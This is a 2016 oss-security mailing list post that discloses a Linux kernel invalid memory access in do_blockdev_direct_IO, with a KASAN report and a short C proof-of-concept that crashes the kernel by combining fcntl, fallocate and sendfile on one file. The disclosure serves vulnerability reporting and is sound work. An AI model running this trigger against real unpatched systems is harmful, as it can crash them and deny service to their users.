Openwall GNU/*/Linux - a small security-enhanced Linux distro for servers
[<prev] [next>] [thread-next>] [day] [month] [year] [list]
Date: Tue, 11 Oct 2016 22:22:48 +0800
From: Marco Grassi <marco.gra@...il.com>
To: oss-security@...ts.openwall.com
Cc: cve-assign@...re.org
Subject: linux kernel do_blockdev_direct_IO invalid memory access

Hello,

I posted this to ask feedback on security at kernel dot org, but I think my
mail got bounced back. Not sure if from the mailing list or from some
single recipient.

Anyway reposting here,

the following program will cause a invalid memory access

BUG: KASAN: wild-memory-access on address 0005080000000000

See this link for the full sanitizer report, stacktrace and trigger poc

https://gist.github.com/marcograss/40850adb3c599ac38e0beac31617d56b

tested on current master, with KASAN.

Marco

---

#include <sys/syscall.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/stat.h>
#define _GNU_SOURCE
#include <fcntl.h>
#include <sys/sendfile.h>

int main()
{
  int ret = 0;
  int fd = open("./hurrdurr", O_APPEND|O_RDWR|0x40);
  ret = fcntl(fd, 4, 0x44000, 0, 0, 0);
  ret = fallocate(fd, 0, 0x21, 0xafa6);
  off_t offset = 0;
  ret = sendfile(fd, fd, &offset, 0x800);
  return 0;
}

Powered by blists - more mailing lists

Your e-mail address:

Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.

Powered by Openwall GNU/*/Linux - Powered by OpenVZ